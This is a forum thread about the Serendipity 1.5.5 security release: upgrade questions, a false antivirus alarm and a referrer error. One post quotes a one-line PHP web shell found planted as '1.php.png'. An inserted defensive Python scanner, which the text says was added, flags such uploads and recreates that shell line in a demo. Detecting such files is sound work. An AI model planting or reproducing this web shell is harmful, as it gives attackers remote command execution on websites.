Serendipity 1.5.5 released: IMPORTANT Security Fix

garvinhicking
Core Developer
Posts: 30014
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany

Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by garvinhicking » Wed Dec 22, 2010 12:36 am

Hi!

Serendipity 1.5.5 has been released to address a serious security issue. Please read http://blog.s9y.org/archives/224-Import ... eased.html

Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/

ellisse
Regular
Posts: 5
Joined: Fri Aug 18, 2006 10:08 am
Location: Italy

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by ellisse » Tue Dec 28, 2010 1:38 pm

Hi... I'm sorry, but I've found a virus named Obfuscated in plugins\QuickTag\tag-lib.js (AVG Antivirus). Can I safely upgrade to Serendipity 1.5.5 after the virus elimination?
Thanks
e.

garvinhicking
Core Developer
Posts: 30014
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by garvinhicking » Wed Dec 29, 2010 1:44 pm

Hi!

tag-lib.js uses javascript encryption to make the size smaller; this is called "compression". Even though some trojans use this technique, it does not inherently mean a security issue. In this case, the tag-lib.js file does not contain any trojan and is meant to be that way.

If you still feel uncomfortable, you can of course delete that file - it is only required for a specific feature of the Xinha WYSIWYG editing component ("QuickTags").

HTH,
Garvin

peacekeeper
Regular
Posts: 13
Joined: Sat Feb 07, 2009 1:54 pm
Location: DE

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by peacekeeper » Wed Dec 29, 2010 3:25 pm

Hi,
after I updated S9Y to version 1.5.5 I cannot create new entries. I have got the following error alert "Ihr Browser hat keinen gültigen HTTP-Referrer übermittelt. Dies kann entweder daher kommen, dass Ihr Browser/Proxy nicht korrekt konfiguriert ist, oder dass Sie Opfer einer "Cross Site Request Forgery (XSRF)" waren, mit der man Sie zu ungewollten Änderungen zwingen wollte. Die angeforderte Aktion konnte daher nicht durchgeführt werden."

I updated 3 of my blogs. It's the same problem on each blog. I tested it on Internet Explorer 8, Firefox and Chrome! Same problem! :-(

garvinhicking
Core Developer
Posts: 30014
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by garvinhicking » Fri Dec 31, 2010 4:38 pm

Hi!

Which version did you upgrade from? Did you change anything in your PHP installation and/or .htaccess?

The error usually only happens if the PHP sessions mismatch, or your browser does not submit a "HTTP Referer" string. Also make sure you use the blog domain name to login that is configured inside s9y as the HTTP host.

HTH,
Garvin

bryzo
Posts: 0
Joined: Sun Jan 02, 2011 11:22 pm

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by bryzo » Mon Jan 03, 2011 12:45 am

I downloaded 1.5.5 LITE yesterday. Is that download already patched? Or do I need to patch it?

Don Chambers
Regular
Posts: 3617
Joined: Mon Feb 13, 2006 3:40 am
Location: Chicago, IL, USA

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by Don Chambers » Mon Jan 03, 2011 3:13 am

The lite version should also be the upgraded version.

Maccsta
Regular
Posts: 77
Joined: Mon Feb 19, 2007 7:07 am
Location: Leeds, England

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by Maccsta » Fri Jan 14, 2011 9:32 pm

I haven't updated some of my blogs for years! Better do this one then!

david@mediacopy
Regular
Posts: 56
Joined: Sun May 18, 2008 5:50 pm

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by david@mediacopy » Tue Jan 25, 2011 3:17 pm

I've just installed the new version. While checking I found a file called

1.php.png

containing the line <?PHP system($_GET['cmd']); ?>

Looking at the logfile for the site, it had been accessed and they were looking for 1.php.jpg and 2.php.jpg
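
A defender-side check for the kind of file described in the post above, as an added example that is not part of the original thread or of Serendipity's code: it flags uploads whose name hides a script extension before the final extension, or whose image-named content contains a PHP open tag. The extension lists and the sample directory are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

MEDIA_EXT = {".png", ".jpg", ".jpeg", ".gif"}      # assumed allowed upload types
SCRIPT_EXT = {".php", ".phtml", ".php5", ".phar"}  # must never appear in a name
PHP_TAG = re.compile(rb"<\?php", re.IGNORECASE)    # short tags (<? / <?=) not covered


def inspect_upload(path):
    """Return the reasons one uploaded file looks suspicious (empty list = clean)."""
    reasons = []
    suffixes = [s.lower() for s in path.suffixes]
    last = suffixes[-1] if suffixes else ""
    if last in SCRIPT_EXT:
        reasons.append("script extension")
    elif any(s in SCRIPT_EXT for s in suffixes[:-1]):
        reasons.append("script extension before final extension")
    if last in MEDIA_EXT and PHP_TAG.search(path.read_bytes()):
        reasons.append("PHP open tag in media file")
    return reasons


def scan_uploads(root):
    """Walk an upload directory; map relative file name -> list of reasons."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            reasons = inspect_upload(path)
            if reasons:
                findings[str(path.relative_to(root))] = reasons
    return findings


def demo():
    """Scan a constructed sample directory (not real site data)."""
    with tempfile.TemporaryDirectory() as tmp:
        up = Path(tmp)
        # File name and content as quoted in the post above.
        (up / "1.php.png").write_bytes(b"<?PHP system($_GET['cmd']); ?>")
        # Constructed clean file: PNG signature followed by filler bytes.
        (up / "holiday.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
        # Constructed file: innocent name, PHP content after a JPEG header.
        (up / "avatar.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"<?php echo 1; ?>")
        return scan_uploads(up)


if __name__ == "__main__":
    print(demo())
```

A hit means the file needs manual review; the check does not show how the file arrived or whether it was ever executed, which is what the web server log is for.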

VideoRob
Regular
Posts: 21
Joined: Fri Feb 01, 2008 7:11 am

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by VideoRob » Wed Feb 23, 2011 5:58 am

Looks like I should update. I have over 50 blogs that I haven't updated in years.
